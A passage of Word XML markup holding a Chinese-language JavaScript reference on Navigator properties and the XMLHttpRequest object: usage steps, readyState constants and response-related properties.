      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly boolean onLine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果当前浏览器在线则为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>；否则为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly string platform</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个标识运行当前浏览器的操作系统以及</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>或硬件平台的字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly string userAgent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>浏览器用于</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求的</w:t>
      </w:r>
      <w:r>
        <w:t>user-agent</w:t>
      </w:r>
      <w:r>
        <w:t>头信息的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="889" w:name="XMLHttpRequest"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:bookmarkEnd w:id="889"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求及响应</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>EventTarget</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象允许客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>发出</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求以及从</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>服务器接收响应（必须是</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>是第</w:t>
      </w:r>
      <w:r>
        <w:t>18</w:t>
      </w:r>
      <w:r>
        <w:t>章的主题，那一章包含了许多关于它的使用的例子。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可以像这样使用</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数（关于如何在</w:t>
      </w:r>
      <w:r>
        <w:t>IE6</w:t>
      </w:r>
      <w:r>
        <w:t>中创建一个</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象的信息请参见</w:t>
      </w:r>
      <w:r>
        <w:t>18.1</w:t>
      </w:r>
      <w:r>
        <w:t>的边栏）创建一个</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>并使用它：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:t>open()</w:t>
      </w:r>
      <w:r>
        <w:t>指明</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>和请求的方法（通常是</w:t>
      </w:r>
      <w:r>
        <w:t>"GET"</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>"POST"</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:t>设置</w:t>
      </w:r>
      <w:r>
        <w:t>onreadystatech</w:t>
      </w:r>
      <w:r>
        <w:t>ange</w:t>
      </w:r>
      <w:r>
        <w:t>属性为一个函数，请求的进度会通知这个函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:t>如果需要的话，调用</w:t>
      </w:r>
      <w:r>
        <w:t>setRequestHeader()</w:t>
      </w:r>
      <w:r>
        <w:t>来指定额外的请求参数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>4.</w:t>
      </w:r>
      <w:r>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:t>send()</w:t>
      </w:r>
      <w:r>
        <w:t>将请求发送到</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>服务器。如果这是一个</w:t>
      </w:r>
      <w:r>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:t>请求，也可以传入一个请求主体（</w:t>
      </w:r>
      <w:r>
        <w:t>request body</w:t>
      </w:r>
      <w:r>
        <w:t>）到这个方法中。随</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>着请求进行，</w:t>
      </w:r>
      <w:r>
        <w:t>onreadystatechage</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理函数将被调用。当</w:t>
      </w:r>
      <w:r>
        <w:t>readyState</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>时，表示响应完成。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>5.</w:t>
      </w:r>
      <w:r>
        <w:t>当</w:t>
      </w:r>
      <w:r>
        <w:t>readyState</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>时，检查状态码</w:t>
      </w:r>
      <w:r>
        <w:t>status</w:t>
      </w:r>
      <w:r>
        <w:t>，以便确保请求成功。如果成功，可使用</w:t>
      </w:r>
      <w:r>
        <w:t>getResponseHeader</w:t>
      </w:r>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>getResponseHeaders()</w:t>
      </w:r>
      <w:r>
        <w:t>来从响应头中检索值，使用</w:t>
      </w:r>
      <w:r>
        <w:t>responseText</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>responseXML</w:t>
      </w:r>
      <w:r>
        <w:t>属性来取得响应主体。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>定义了</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>协议的一个相对高级的接口，关于重定向、</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>管理以及使用</w:t>
      </w:r>
      <w:r>
        <w:t>CORS</w:t>
      </w:r>
      <w:r>
        <w:t>头协商跨域连接等细节都将由它处理。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>上面介绍的</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>特性在所有现代浏览器中都有很好的支持。在写作本书的时候，一个</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest Level 2</w:t>
      </w:r>
      <w:r>
        <w:t>标准正在开始发布，并且一些浏览器已经开始实现它。下面列出的属性、方法以及事件处理程</w:t>
      </w:r>
      <w:r>
        <w:t>序包含</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest Level 2</w:t>
      </w:r>
      <w:r>
        <w:t>特性，这些特性可能还没有被所有浏览器实现。这些新特性将用</w:t>
      </w:r>
      <w:r>
        <w:t>"XHR2"</w:t>
      </w:r>
      <w:r>
        <w:t>标记。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>构造函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>new XMLHttpRequest()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>这个无参数的构造函数返回一个</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>常量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这些常量定义</w:t>
      </w:r>
      <w:r>
        <w:t>readyState</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值。在</w:t>
      </w:r>
      <w:r>
        <w:t>XHR2</w:t>
      </w:r>
      <w:r>
        <w:t>之前，这些常量没有广泛定义，大多数代码使用整数字面量而不是这些符号值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short UNSENT=0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这是</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象刚创建或被</w:t>
      </w:r>
      <w:r>
        <w:t>abort()</w:t>
      </w:r>
      <w:r>
        <w:t>方法重置时</w:t>
      </w:r>
      <w:r>
        <w:t>readyState</w:t>
      </w:r>
      <w:r>
        <w:t>属性的初始值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short OPENED=1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>已经调用</w:t>
      </w:r>
      <w:r>
        <w:t>open()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，但还没调用</w:t>
      </w:r>
      <w:r>
        <w:t>send()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。还没有发送请求。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short HEADERS_RECEIVED=2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>send()</w:t>
      </w:r>
      <w:r>
        <w:t>方法已调用，已经接收到响应头，但还没有接收到响应主体。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short LOADING=3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>正在接收响应主体，但还没有完成。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short DONE=4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>响应已全部接收</w:t>
      </w:r>
      <w:r>
        <w:t>，或由于错误而停止。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly unsigned short readyState</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求的状态以及服务器的响应。当一个</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>首次创建时这个属性的值为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>，然后逐渐递增，当整个</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>响应已接收到时这个属性增加为</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>。上面列出的常量指定了可能的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readyState</w:t>
      </w:r>
      <w:r>
        <w:t>的值永远不会递减，除非在一个正在进行中的请求上调用了</w:t>
      </w:r>
      <w:r>
        <w:t>abort()</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>open()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>理论上，每当这个属性的值改变时都会分发一个</w:t>
      </w:r>
      <w:r>
        <w:t>readystatechange</w:t>
      </w:r>
      <w:r>
        <w:t>事件。但实际上，只有</w:t>
      </w:r>
      <w:r>
        <w:t>readyState</w:t>
      </w:r>
      <w:r>
        <w:t>改变为</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>时才保证会触发这个事件。（</w:t>
      </w:r>
      <w:r>
        <w:t>XHR2</w:t>
      </w:r>
      <w:r>
        <w:t>的进度事件提供了一种更可靠的跟踪请求处理的方法。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly any response</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>XHR2</w:t>
      </w:r>
      <w:r>
        <w:t>中，这个属性保存服务器的响应。它的类型取决于</w:t>
      </w:r>
      <w:r>
        <w:t>responseType</w:t>
      </w:r>
      <w:r>
        <w:t>属性。如果</w:t>
      </w:r>
      <w:r>
        <w:t>responseType</w:t>
      </w:r>
      <w:r>
        <w:t>为空字符串或</w:t>
      </w:r>
      <w:r>
        <w:t>"text"</w:t>
      </w:r>
      <w:r>
        <w:t>，这个属性将把响应主体当做一个字符串。如果</w:t>
      </w:r>
      <w:r>
        <w:t>reponseType</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>"document"</w:t>
      </w:r>
      <w:r>
        <w:t>，这个属性将把响应主体解析为一个</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP Document</w:t>
      </w:r>
      <w:r>
        <w:t>。如果</w:t>
      </w:r>
      <w:r>
        <w:t>resp</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>onseType</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>"arraybuffer"</w:t>
      </w:r>
      <w:r>
        <w:t>，这个属性将是一个代表响应主体的字</w:t>
      </w:r>
      <w:r>
        <w:t>节的</w:t>
      </w:r>
      <w:r>
        <w:t>ArrayBuffer</w:t>
      </w:r>
      <w:r>
        <w:t>对象。如果</w:t>
      </w:r>
      <w:r>
        <w:t>responseType</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>"blob"</w:t>
      </w:r>
      <w:r>
        <w:t>，这个属性将是一个代表响应主体的字节的</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly string responseText</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>readyState</w:t>
      </w:r>
      <w:r>
        <w:t>小于</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>，这个属性将是空字符串。当</w:t>
      </w:r>
      <w:r>
        <w:t>readyState</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>时，这个属性将返回目前已接收到的响应部分。如果</w:t>
      </w:r>
      <w:r>
        <w:t>readyState</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>，这个属性的值为响应的全部主体。如果当前响应的头信息指定主体的字符编码，则这个编码将被使用。否则，默认将使用</w:t>
      </w:r>
      <w:r>
        <w:t>Unicode UTF-8</w:t>
      </w:r>
      <w:r>
        <w:t>编码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string responseTy</w:t>
      </w:r>
      <w:r>
        <w:t>pe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>XHR2</w:t>
      </w:r>
      <w:r>
        <w:t>中，这个属性指明期望的响应类型，并判断</w:t>
      </w:r>
      <w:r>
        <w:t>response</w:t>
      </w:r>
      <w:r>
        <w:t>属性的类型。合法的值有</w:t>
      </w:r>
      <w:r>
        <w:t>"text"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"document"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"arraybuffer"</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>"blob"</w:t>
      </w:r>
      <w:r>
        <w:t>。默认值为空字符串，等同于</w:t>
      </w:r>
      <w:r>
        <w:t>"text"</w:t>
      </w:r>
      <w:r>
        <w:t>。如果设置这个属性，</w:t>
      </w:r>
      <w:r>
        <w:t>responseText</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>responseXML</w:t>
      </w:r>
      <w:r>
        <w:t>属性将抛出异常，必须使用</w:t>
      </w:r>
      <w:r>
        <w:t>XHR2</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>response</w:t>
      </w:r>
      <w:r>
        <w:t>属性来获得服务器的响应。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly Document responseXML</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>请求对应的响应，已解析为一个</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>HTML Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象，如果响应主体还没有就绪或不是一个</w:t>
      </w:r>
      <w:r>
        <w:t>有效的</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档则为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>readonly unsigned short status</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>服务器返回的</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>状态码，比如</w:t>
      </w:r>
      <w:r>
        <w:t>200</w:t>
      </w:r>
      <w:r>
        <w:t>代表成功，</w:t>
      </w:r>
      <w:r>
        <w:t>404</w:t>
      </w:r>
      <w:r>
        <w:t>代表</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>页面未找到</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>错误，如果服务器还设有设置状态码则为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
